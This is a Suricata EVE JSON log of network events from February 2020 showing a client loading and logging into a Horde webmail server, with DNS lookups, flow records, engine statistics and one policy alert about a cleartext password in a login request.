{"timestamp":"2020-02-29T00:24:48.432132+0000","flow_id":1027445017833512,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53118,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/imp\/js\/login.js?v=29c8308baa6508a21e1be9e3345d1287","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/login.php","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":280}} {"timestamp":"2020-02-29T00:24:48.432491+0000","flow_id":2058924363639521,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53110,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/js\/accesskeys.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/login.php","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":1005},"app_proto":"http","fileinfo":{"filename":"\/js\/accesskeys.js","state":"CLOSED","stored":false,"size":2729,"tx_id":1}} {"timestamp":"2020-02-29T00:24:48.432746+0000","flow_id":2058924363639521,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53110,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":2,"http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/horde-power1.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/login.php","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":2258}} {"timestamp":"2020-02-29T00:24:48.429717+0000","flow_id":404301097748814,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53108,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":1,"http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/screen.css","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/css","http_refer":"http:\/\/mail.spiral.com\/login.php","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":9246}} {"timestamp":"2020-02-29T00:24:48.430661+0000","flow_id":1391374776691898,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53116,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/js\/login.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/login.php","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":1118}} {"timestamp":"2020-02-29T00:24:48.448591+0000","flow_id":25411967806218,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53112,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/js\/prototype.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/login.php","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":31816},"app_proto":"http","fileinfo":{"filename":"\/js\/prototype.js","state":"TRUNCATED","stored":false,"size":106496,"tx_id":0}} {"timestamp":"2020-02-29T00:24:48.450066+0000","flow_id":25411967806218,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53112,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/js\/prototype.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/login.php","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":46054}} {"timestamp":"2020-02-29T00:24:48.513328+0000","flow_id":25411967806218,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53112,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":1,"http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/button-default.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":87}} {"timestamp":"2020-02-29T00:24:48.575865+0000","flow_id":25411967806218,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53112,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/button-default.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":87},"app_proto":"http","fileinfo":{"filename":"\/themes\/default\/graphics\/button-default.png","state":"CLOSED","stored":false,"size":87,"tx_id":1}} {"timestamp":"2020-02-29T00:24:48.576235+0000","flow_id":25411967806218,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53112,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":2,"http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/favicon.ico","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/vnd.microsoft.icon","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":918}} {"timestamp":"2020-02-29T00:24:49.000298+0000","event_type":"stats","stats":{"uptime":15141,"capture":{"kernel_packets":140362,"kernel_drops":0},"decoder":{"pkts":140368,"bytes":96376832,"invalid":195,"ipv4":138787,"ipv6":10,"ethernet":140368,"raw":0,"null":0,"sll":0,"tcp":133233,"udp":5344,"sctp":0,"icmpv4":15,"icmpv6":10,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":686,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10002,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7088416},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2883,"ssn_memcap_drop":0,"pseudo":352,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2899,"synack":2890,"rst":1216,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":148,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":25},"app_layer":{"flow":{"http":1898,"ftp":0,"smtp":0,"tls":779,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":107,"dcerpc_udp":0,"dns_udp":2445,"failed_udp":116},"tx":{"http":4911,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2527}},"flow_mgr":{"closed_pruned":2869,"new_pruned":17,"est_pruned":2520,"bypassed_pruned":0,"flows_checked":5,"flows_notimeout":1,"flows_timeout":4,"flows_timeout_inuse":2,"flows_removed":2,"rows_checked":65536,"rows_skipped":65531,"rows_empty":0,"rows_busy":0,"rows_maxlen":1},"dns":{"memuse":12884,"memcap_state":0,"memcap_global":0},"http":{"memuse":259172,"memcap":0}}} {"timestamp":"2020-02-29T00:24:49.001045+0000","flow_id":2154259743701700,"event_type":"flow","src_ip":"192.168.10.130","src_port":34274,"dest_ip":"192.168.10.122","dest_port":443,"proto":"TCP","app_proto":"tls","flow":{"pkts_toserver":39,"pkts_toclient":66,"bytes_toserver":5625,"bytes_toclient":81171,"start":"2020-02-29T00:22:30.916164+0000","end":"2020-02-29T00:22:36.258283+0000","age":6,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:24:49.001535+0000","flow_id":1798765300213308,"event_type":"flow","src_ip":"192.168.10.130","src_port":34272,"dest_ip":"192.168.10.122","dest_port":443,"proto":"TCP","app_proto":"tls","flow":{"pkts_toserver":37,"pkts_toclient":73,"bytes_toserver":4670,"bytes_toclient":95925,"start":"2020-02-29T00:22:24.976444+0000","end":"2020-02-29T00:22:30.123349+0000","age":6,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:24:50.000647+0000","flow_id":1638833592828724,"event_type":"flow","src_ip":"192.168.10.122","src_port":48417,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:19:49.688948+0000","end":"2020-02-29T00:19:49.800136+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:24:51.000340+0000","flow_id":1012257993948441,"event_type":"flow","src_ip":"192.168.10.122","src_port":39263,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:19:50.490777+0000","end":"2020-02-29T00:19:50.601928+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:24:51.001295+0000","flow_id":545992049333857,"event_type":"flow","src_ip":"192.168.10.122","src_port":59343,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:19:50.628321+0000","end":"2020-02-29T00:19:50.736476+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:24:51.001598+0000","flow_id":559357987575908,"event_type":"flow","src_ip":"192.168.10.122","src_port":54554,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:19:50.252004+0000","end":"2020-02-29T00:19:50.360299+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:24:53.433983+0000","flow_id":2226118850538449,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53114,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/js\/horde.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/login.php","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":2236},"app_proto":"http","fileinfo":{"filename":"\/js\/horde.js","state":"CLOSED","stored":false,"size":6422,"tx_id":0}} {"timestamp":"2020-02-29T00:24:53.434123+0000","flow_id":1027445017833512,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53118,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/imp\/js\/login.js?v=29c8308baa6508a21e1be9e3345d1287","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/login.php","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":280},"app_proto":"http","fileinfo":{"filename":"\/imp\/js\/login.js","state":"CLOSED","stored":false,"size":415,"tx_id":0}} {"timestamp":"2020-02-29T00:24:53.434165+0000","flow_id":2058924363639521,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53110,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/horde-power1.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/login.php","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":2258},"app_proto":"http","fileinfo":{"filename":"\/themes\/default\/graphics\/horde-power1.png","state":"CLOSED","stored":false,"size":2258,"tx_id":2}} {"timestamp":"2020-02-29T00:24:53.434077+0000","flow_id":1391374776691898,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53116,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/js\/login.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/login.php","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":1118},"app_proto":"http","fileinfo":{"filename":"\/js\/login.js","state":"CLOSED","stored":false,"size":3062,"tx_id":0}} {"timestamp":"2020-02-29T00:24:53.434898+0000","flow_id":404301097748814,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53108,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/screen.css","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/css","http_refer":"http:\/\/mail.spiral.com\/login.php","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":9246},"app_proto":"http","fileinfo":{"filename":"\/themes\/default\/screen.css","state":"CLOSED","stored":false,"size":48239,"tx_id":1}} {"timestamp":"2020-02-29T00:24:53.581143+0000","flow_id":25411967806218,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53112,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/favicon.ico","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/vnd.microsoft.icon","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":918},"app_proto":"http","fileinfo":{"filename":"\/themes\/default\/graphics\/favicon.ico","state":"CLOSED","stored":false,"size":918,"tx_id":2}} {"timestamp":"2020-02-29T00:24:54.000497+0000","flow_id":1486409513894428,"event_type":"flow","src_ip":"192.168.10.130","src_port":34280,"dest_ip":"192.168.10.122","dest_port":443,"proto":"TCP","app_proto":"tls","flow":{"pkts_toserver":32,"pkts_toclient":64,"bytes_toserver":3501,"bytes_toclient":80837,"start":"2020-02-29T00:23:45.393756+0000","end":"2020-02-29T00:23:50.437750+0000","age":5,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1f","tcp_flags_ts":"1f","tcp_flags_tc":"1b","syn":true,"fin":true,"rst":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:24:54.000728+0000","flow_id":231209601455855,"event_type":"flow","src_ip":"192.168.10.122","src_port":33684,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:19:53.120559+0000","end":"2020-02-29T00:19:53.229605+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:24:55.000492+0000","flow_id":2148994103536245,"event_type":"flow","src_ip":"192.168.10.122","src_port":50516,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":86,"bytes_toclient":141,"start":"2020-02-29T00:19:54.289397+0000","end":"2020-02-29T00:19:54.400745+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:24:56.000214+0000","event_type":"stats","stats":{"uptime":15148,"capture":{"kernel_packets":140517,"kernel_drops":0},"decoder":{"pkts":140526,"bytes":96460879,"invalid":195,"ipv4":138945,"ipv6":10,"ethernet":140526,"raw":0,"null":0,"sll":0,"tcp":133391,"udp":5344,"sctp":0,"icmpv4":15,"icmpv6":10,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":686,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7087552},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2889,"ssn_memcap_drop":0,"pseudo":352,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2905,"synack":2896,"rst":1216,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":148,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":25},"app_layer":{"flow":{"http":1904,"ftp":0,"smtp":0,"tls":779,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":107,"dcerpc_udp":0,"dns_udp":2445,"failed_udp":116},"tx":{"http":4922,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2527}},"flow_mgr":{"closed_pruned":2871,"new_pruned":17,"est_pruned":2525,"bypassed_pruned":0,"flows_checked":2,"flows_notimeout":1,"flows_timeout":1,"flows_timeout_inuse":1,"flows_removed":0,"rows_checked":65536,"rows_skipped":65534,"rows_empty":0,"rows_busy":0,"rows_maxlen":1},"dns":{"memuse":10899,"memcap_state":0,"memcap_global":0},"http":{"memuse":560,"memcap":0}}} {"timestamp":"2020-02-29T00:24:56.288577+0000","flow_id":1196688204654401,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":60959,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":52541,"rrname":"81.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:24:56.397551+0000","flow_id":1196688204654401,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":60959,"proto":"UDP","dns":{"type":"answer","id":52541,"rcode":"NXDOMAIN","rrname":"81.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:24:56.397551+0000","flow_id":1196688204654401,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":60959,"proto":"UDP","dns":{"type":"answer","id":52541,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:24:56.412364+0000","flow_id":1196688204654401,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":60959,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":52542,"rrname":"81.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":1}} {"timestamp":"2020-02-29T00:24:56.520432+0000","flow_id":1196688204654401,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":60959,"proto":"UDP","dns":{"type":"answer","id":52542,"rcode":"NXDOMAIN","rrname":"81.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:24:56.520432+0000","flow_id":1196688204654401,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":60959,"proto":"UDP","dns":{"type":"answer","id":52542,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:24:56.531252+0000","flow_id":105264000271271,"in_iface":"eth0","event_type":"alert","src_ip":"192.168.10.81","src_port":53120,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"alert":{"action":"allowed","gid":1,"signature_id":2012887,"rev":3,"signature":"ET POLICY Http Client Body contains pass= in cleartext","category":"Potential Corporate Privacy Violation","severity":1},"http":{"hostname":"mail.spiral.com","url":"\/login.php","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/login.php","http_method":"POST","protocol":"HTTP\/1.1","status":302,"redirect":"\/services\/portal\/","length":20}} {"timestamp":"2020-02-29T00:24:56.531252+0000","flow_id":105264000271271,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53120,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/login.php","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/login.php","http_method":"POST","protocol":"HTTP\/1.1","status":302,"redirect":"\/services\/portal\/","length":20}} {"timestamp":"2020-02-29T00:24:56.531252+0000","flow_id":105264000271271,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.81","src_port":53120,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/login.php","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/login.php","http_method":"POST","protocol":"HTTP\/1.1","status":302,"redirect":"\/services\/portal\/","length":20},"app_proto":"http","fileinfo":{"filename":"\/login.php","state":"CLOSED","stored":false,"size":113,"tx_id":0}} {"timestamp":"2020-02-29T00:24:56.554604+0000","flow_id":1553767490680428,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":50033,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":19211,"rrname":"81.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:24:56.663729+0000","flow_id":1553767490680428,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":50033,"proto":"UDP","dns":{"type":"answer","id":19211,"rcode":"NXDOMAIN","rrname":"81.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:24:56.663729+0000","flow_id":1553767490680428,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":50033,"proto":"UDP","dns":{"type":"answer","id":19211,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:24:56.845414+0000","flow_id":1553767490680428,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":50033,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":19212,"rrname":"81.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":1}} {"timestamp":"2020-02-29T00:24:56.953878+0000","flow_id":1553767490680428,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":50033,"proto":"UDP","dns":{"type":"answer","id":19212,"rcode":"NXDOMAIN","rrname":"81.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:24:56.953878+0000","flow_id":1553767490680428,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":50033,"proto":"UDP","dns":{"type":"answer","id":19212,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:24:57.000273+0000","flow_id":1727159595722396,"event_type":"flow","src_ip":"192.168.10.122","src_port":51027,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:19:56.485020+0000","end":"2020-02-29T00:19:56.595891+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:24:57.177311+0000","flow_id":105264000271271,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53120,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":1,"http":{"hostname":"mail.spiral.com","url":"\/services\/portal\/","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/login.php","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":8192}} {"timestamp":"2020-02-29T00:24:57.177971+0000","flow_id":105264000271271,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53120,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/portal\/","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/login.php","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":8192},"app_proto":"http","fileinfo":{"filename":"\/services\/portal\/","state":"CLOSED","stored":false,"size":47189,"tx_id":1}} {"timestamp":"2020-02-29T00:24:57.181252+0000","flow_id":574029615970907,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53122,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/kronolith\/themes\/default\/block\/screen.css","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/css","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":196}} {"timestamp":"2020-02-29T00:24:57.182655+0000","flow_id":327567212657976,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53124,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/ingo\/themes\/default\/block\/screen.css","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/css","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":201}} {"timestamp":"2020-02-29T00:24:57.183236+0000","flow_id":1255271558660282,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53126,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/nag\/themes\/default\/block\/screen.css","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/css","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":119}} {"timestamp":"2020-02-29T00:24:57.184142+0000","flow_id":291270444040479,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53128,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/turba\/themes\/default\/block\/screen.css","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/css","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":131}} 